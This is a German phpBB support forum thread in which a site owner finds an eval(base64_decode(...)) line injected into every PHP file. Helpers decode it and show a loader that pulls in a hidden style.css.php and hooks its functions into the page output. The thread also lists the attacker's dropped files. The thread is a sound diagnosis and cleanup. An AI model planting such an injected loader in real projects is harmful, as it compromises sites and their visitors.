Ominöse Zeilen in JEDER php-Datei

[TeddyKlaus]

Hallo,

ich habe mal 'ne Frage:

Auf meinem Server haben alle PHP-Dateien die folgende Zeile im Code:

Code: Alles auswählen

<?php /**/eval(base64_decode('bla bla=')); ?>

Habt Ihr 'ne Ahnung, was das ist? Auf meinem Testserver sehen die Dateien nicht so aus.

Der Code ist immer "vor"der ersten Zeile eingefügt.

Viele Grüße
Klaus

[Tim]

Hallo Klaus,

das sieht aus wie eine Base64 Verschlüsselung, die das folgende Script, bzw. den Code in den PHP-Dateien für die Ausgabe verschlüsseln soll.
Genau kenne ich mich damit nicht aus, habe nur mal kurz gegoogelt. LG Tim

[bantu]

Die Zeile gehört nicht zu phpBB und deutet darauf hin, dass jemand Zugang zu deinem Benutzeraccount hatte.

[Tim]

Die Zeile gehört nicht zu phpBB und deutet darauf hin, dass jemand Zugang zu deinem Benutzeraccount hatte.

Naja, da es ja in jeder PHP-Datei ist glaube ich eher, dass der Webspaceanbieter das so eingerichtet hat, dass jede PHP-Datei diese Verschlüsselung bekommt. Frag da einfach mal nach. Wenn der nein sagt, dann wird es wirklich nichts Positives sein.

[cYbercOsmOnauT]

Das ist definitiv nicht von Deinem Hoster. Hier die decodierte Version der Base64 Zeile

Code: Alles auswählen

if (function_exists('ob_start') && !isset($GLOBALS['mfsn']))
{
	$GLOBALS['mfsn']='/kunden/homepages/30/d253151289/htdocs/Tastenboard/bulitipp/include/jscalendar/skins/aqua/style.css.php';
	if (file_exists($GLOBALS['mfsn'])){
		include_once($GLOBALS['mfsn']);
		if (function_exists('gml') && function_exists('dgobh')) {
			ob_start('dgobh');
		}
	}
}

Innerhalb Deines Styles ist anscheinend eine style.css.php die m.E. bösartige Funktionen nachläd. Diese Funktion wird als Callback eines Ausgabepuffers gesetzt. Ich denke mal, dass dieser Callback dann die Ausgabe im Sinne der Cracker verändert.

Hierfür gibt es zwei mögliche Angriffspunkte: Entweder hat jemand Euren Server-/Ftp-Zugang gehackt und dort die Dateien verändert, oder aber Du hast Dir einen Trojaner eingefangen der dies ohne das Du es siehst gemacht hat. Du solltest auf jeden Fall Deinen Rechner überprüfen und die Datei entfernen sowie diese Zeile überall auch.

Viele Grüße,
Tekin

[TeddyKlaus]

Vielen Dank für Eure Meinungen und Hinweise.

Ich habe jetzt den kompletten Code runtergeladen, den Code in jedem php-file gelöscht und wieder hochgeladen. Ich hatte nämlich auch das Problem, dass ich z.B. bei der Schnellmoderation immer auf eine Seite gelangt bin, die nur aus einem Passwortfeld bestand.

Ich habe eine Vermutung, wobei ich aber niemandem was schlechtes unterstellen will.

Die style.css.php steht im include-Verzeichnis meines Bundesligatippspiels (xcript). Da stehen aber normalerweise nur gif-files und eine theme.css drin.

Jetzt stehen da jede Menge mehr Dateien auf dem Server. Hier nur die zusätzlichen Dateien:

Code: Alles auswählen

17.12.2009  08:53               776 cnf
17.12.2009  08:53               128 csi
17.12.2009  08:53            35.455 dg.php
17.12.2009  08:53                 0 lock
17.12.2009  08:53            62.159 s.php
17.12.2009  08:53            89.338 skwd
17.12.2009  08:53           180.760 style.css.php
17.12.2009  08:53               402 swf

Die Datei skwd besteht aus 9.638 Keywords mit zweifelhaftem Inhalt.

Auf dem Server sind alle PHP-Dateien am 14.12.2009 um 20.11 Uhr geändert worden. In den Logs finde ich keinen passenden Eintrag, weder in den access noch in den ftp-logs.

Ich lasse die Spiel- und Ergebnisdaten über mehrere Cronjobs bei http://www.cronjob.de aktualisieren.

Ich habe jetzt auch komplett alle Dateien des MODs ausgetauscht.

Gruß
Klaus

[Thyron]

Klaus, das ist ja wirklich genau das gleiche Problem, das ich habe bzw. wie ich hoffe hatte...

[Metzle]

Hallo,

ich habe auch hier dann mal im ersten Beitrag den Code entschärft, damit damit kein Schaden verursacht werden kann.